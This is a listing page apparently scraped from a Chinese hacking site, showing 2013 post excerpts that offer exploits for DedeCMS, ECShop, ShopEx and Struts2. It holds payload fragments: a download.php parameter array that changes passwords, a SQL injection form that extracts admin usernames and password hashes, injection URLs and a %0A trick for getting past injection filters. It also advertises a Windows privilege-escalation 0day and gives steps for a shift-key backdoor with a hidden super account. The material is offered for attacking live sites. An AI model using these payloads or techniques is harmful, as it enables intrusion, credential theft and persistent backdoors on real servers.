Webshell - webshell.cc
General Information:
Latest News:
DEDE 5.7 综合利用 getshell 20 Aug 2013 | 09:19 am
修改密码: /plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100...
ecshop后台shell技术分享 10 Aug 2013 | 09:04 pm
之前出了几个ecshop漏洞,得到了密码但是都破解不出来,虽然知道后台。 用户密码 admin:d03a7617433c2826976062fec569a434 ecshop 有一个表ecs_shop_config ,里面有hash_code 貌似2.7.2 和2.7.3都是31693422540744c0a6b6da635b7a5a93 那就用之前的admin的密码和hash_code的 放在...
Struts2 S2-016/S2-017 exp整理 10 Aug 2013 | 09:01 pm
大家都发了,,我就整理了一下。友情提示,自己小命比shell重要哦。。 喜欢就点一下感谢吧^_^ 带回显命令执行: 爆路径: 写文件: 写入的文件内容: 其实就是一个jsp的小马,需要客户端配合 函数f是文件名,t是内容 客户端: 就在当前目录建立一个fjp.jsp 还有@园长的一个客户端: 还有@X发的一个wget的getshell
shopex 4.8.5 api.php注入漏洞0day exp 10 Aug 2013 | 08:55 pm
<form method='post' action='http://www.webshell.cc/api.php?act=search_dly_type&api_version=1.0'> columns:<input type='text' value='1,2,(SELECT concat(username,0x7c,userpass) FROM sdb_operators limit ...
刚刚捞到的提权0DAY,亲测2K3成功. 29 Jun 2013 | 10:34 pm
不多说 上图: windows 提权0day 下载地址:EPATHOBJExploit
dedecms 躺着也中枪 爆重装漏洞 29 Jun 2013 | 10:29 pm
利用条件:web server: apache 漏洞原因::apache 不认识bak 直接当php执行. http://webshell.cc/install/index.php.bak?insLockfile=1 这dedecms死的太冤枉了. apache的原因.
dedecms最新版本修改任意管理员漏洞 附getshell exp 29 Jun 2013 | 10:13 pm
此漏洞无视gpc转义,过80sec注入防御。 补充下,不用担心后台找不到。这只是一个demo,都能修改任意数据库了,还怕拿不到SHELL? 起因是全局变量$GLOBALS可以被任意修改,随便看了下,漏洞一堆,我只找了一处。 include/dedesql.class.php: … 另外说下绕过80sec防注入的方法。 同一文件中,有两个执行SQL的函数。ExecuteNoneQue...
GET参数SQL注入%0A换行污染绕过 29 Jun 2013 | 10:11 pm
绕过描述: 在GET请求时,将URL的SQL注入关键字用%0A分隔,%0A是换行符,在mysql中可以正常执行。 测试方法: 请求测试url:http://www.webshell.cc/1.php?id=1%20union%20select%201,2,3,4 — 被拦截 请求测试url:http://www.webshell.cc/1.php?id=-9%0Aunion%...
ECShop网店系统最新版本地包含漏洞 29 Jun 2013 | 10:00 pm
这个洞,其实我在2012年1月的时候看ecshop就分析出来过,当初由于感觉鸡肋就没怎么放出来。刚下了个官网最新版的,没想到还存在。 漏洞文件在:/demo/index.php 为了方便测试,我在本地网站根目录下建立一个1.php 代码如下: 然后利用如下: 成功包含 根目录下1.php 由于本机,搭建环境出了个问题,这个是借别人的图。。应该为post提交,这个漏洞鸡肋之处...
shift后门制作和超级帐户的建立 31 May 2013 | 08:21 am
前段时间去一个流量过百万的站的服务器上参观,朋友加了一个shift后门并称该后门是很久以前他公布的,具体情况我也没多问,回来后自己也做了一个加密码的shift后门.利用winrar加密的.很简单,火力群里一个小弟弟问我怎么做的,叫我写个说明,那么我就简单介绍一下制作过程-Amxking 1.我们首先建立一个名为win.rar的压缩包,及一个批处理命令名为AK.bat的文件. 2.再...